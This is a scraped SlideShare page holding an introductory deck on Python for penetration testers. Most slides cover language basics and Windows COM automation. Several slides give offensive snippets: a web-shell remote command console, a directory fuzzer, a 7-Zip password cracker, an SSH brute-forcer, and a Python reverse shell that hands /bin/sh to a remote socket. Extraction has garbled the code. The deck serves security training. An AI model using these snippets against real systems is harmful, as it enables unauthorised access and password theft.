Your SlideShare is downloading. ×
Python for Penetration testers
Upcoming SlideShare
Loading in...5

Thanks for flagging this SlideShare!

Oops! An error has occurred.


Saving this for later?

Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime - even offline.

Text the download link to your phone

Standard text messaging rates apply

Python for Penetration testers


Published on

Quick presentation on how a penetration tester can start using Python to automate many of the task, create new tools, etc. For my colleagues..

Quick presentation on how a penetration tester can start using Python to automate many of the task, create new tools, etc. For my colleagues..

Published in: Technology

1 Comment
  • Thank you man this pdf help me to perfect my python code !
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Total Views
On Slideshare
From Embeds
Number of Embeds
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

No notes for slide


  • 1. Why?™  EASY (install, learn, code)™  Tons of libraries™  Code is easy to understand™  Multiplatform™  Good for prototyping
  • 2. History™  Conceived in late 80´s and first implementation in 1989™  Created by Guido Van Rossum™  Benevolent Dictator for Life™  Actually there are two branches 2.x and 3.0
  • 3. Python 101™  Interpreted language™  Object oriented™  Indentation is significant in Python, block delimiter.™  Usual control structures (if, while, etc)™  Multiple levels of organization (function, classes, modules, packages)
  • 4. Who is using Python?™  Core Impact ™  ImmunityDebugger™  Canvas ™  Peach™  W3AF ™  Sulley™  Sqlmap ™  Paimei™  Impacket ™  Scapy™  Google ™  Spike Proxy
  • 5. Python 101Data types: ™  Strings - “Hello” ™  Numbers - 123 ™  Lists – [‘hello’,’2’,’1’] ™  Tuples - (‘1’,’2’,’3’) (immutable) ™  Dictionaries – d = {‘key1’:’dog’,’key2’:’cat’}
  • 6. Python 101Structures:list=[1,2,3,4,5] if 3 > x: print “ 3 is bigger than” + x for x in list: else: print x print “ 3 is smaller than” + x
  • 7. Python 101Example Hello World: print “Hello World” With variables: msg=“Hello World” print msg
  • 8. Python 101™  Interactive python shell™  The commands execute line per line as you type™  Good for testing small pieces of code as loops, regex, etc™  Type “python” and enter to access the shell
  • 9. Python 101™  Strings starts counting in 0 and can have also negative indexes™  msg[0] is H™  msg[-1] is d
  • 10. Basic Code bitsimport sysofile = ”names.txt”fil = open(ofile,w’)x = fil.readlines()for y in x: print y
  • 11. Urllib2™  Library to deal with HTTP import urllib2 response = urllib2.urlopen( html = print html
  • 12. Basic fuzzerimport sys, urllib2 ofile = ”dirs.txt” fil = open(ofile,w) dirs = fil.readlines() for x in dirs: response = urllib2.urlopen(’+x) html =
  • 13. Encodingimport base64 string=“TEST” base64.standard_b64encode(string) VEVTVA== import hashlib’) m.update(string) res = m.hexdigest() print res 033bd94b1168d7e4f0d644c3c95e35bf
  • 14. Generic Console for Web Remote Executionimport httplib, urllib, sys host=”XXXXXXXXXX” while 1: cmd=raw_input("Exploited@"+host+"#>") if cmd=="exit": sys.exit() else: h = httplib.HTTP(host) cmd=urllib.quote(cmd) print cmd h.putrequest(GET,”/myconsole123/my-shell.jsp?pass=1231&cmd="+cmd) h.putheader(Host, host) h.putheader(User-agent, Internet Explorer 6.0 ) h.endheaders() returncode, returnmsg, headers = h.getreply()
  • 15. 7 Zip Crackerimport os, sys, pylzma from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError pas = open(passwords.txt, rb) password=pas.readlines() for x in password: try: fp = open(test.7z, rb) archive = Archive7z(fp, password=x) print ”The password is" + x sys.exit() except Exception, e: fp.close()
  • 16. A Web browser#!/usr/bin/env python import sys from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4.QtWebKit import * app = QApplication(sys.argv) web = QWebView() web.load(QUrl("")) sys.exit(app.exec_())
  • 17. One line Webserver™  python -m SimpleHTTPServer 8080
  • 18. SSH Bruteforcert = paramiko.Transport(hostname)try: t.start_client()except Exception: x=0try: t.auth_password(username=username,password=passw)except Exception: x=0if t.is_authenticated(): print “Password found “ + passw
  • 19. Proxy Strike Deflate Patch™  Pd contains the POST DATA in the repeat function: import zlib defla= zlib.compress(pd)
  • 20. Reverse Shellimport socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("",1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)["/bin/sh","-i"])
  • 21. Win32Com™  Library that allows us to access COM objects in Win32 systems™  We can automate Word, Excel, Powerpoint, access WMI, AD, etc
  • 22. Massive printingfrom win32com import clientimport timeword = client.Dispatch("Word.Application”)def printPDFDocument(filename): word.Documents.Open(filename) word.ActiveDocument.PrintOut() time.sleep(5) word.ActiveDocument.Close() word.Quit()printPDFDocument("c:test.doc")
  • 23. Excel Processingfrom win32com.client import Dispatch xlApp = Dispatch("Excel.Application") xlApp.Visible = 1"test.xls") for x in range(1,100): nombre=str(xlApp.ActiveSheet.Cells(x,5)) print nombre xlApp.Quit()
  • 24. WMIimport wmic = wmi.WMI ()for process in c.Win32_Process (): print process.ProcessId, process.Name
  • 25. Interesting stuff™™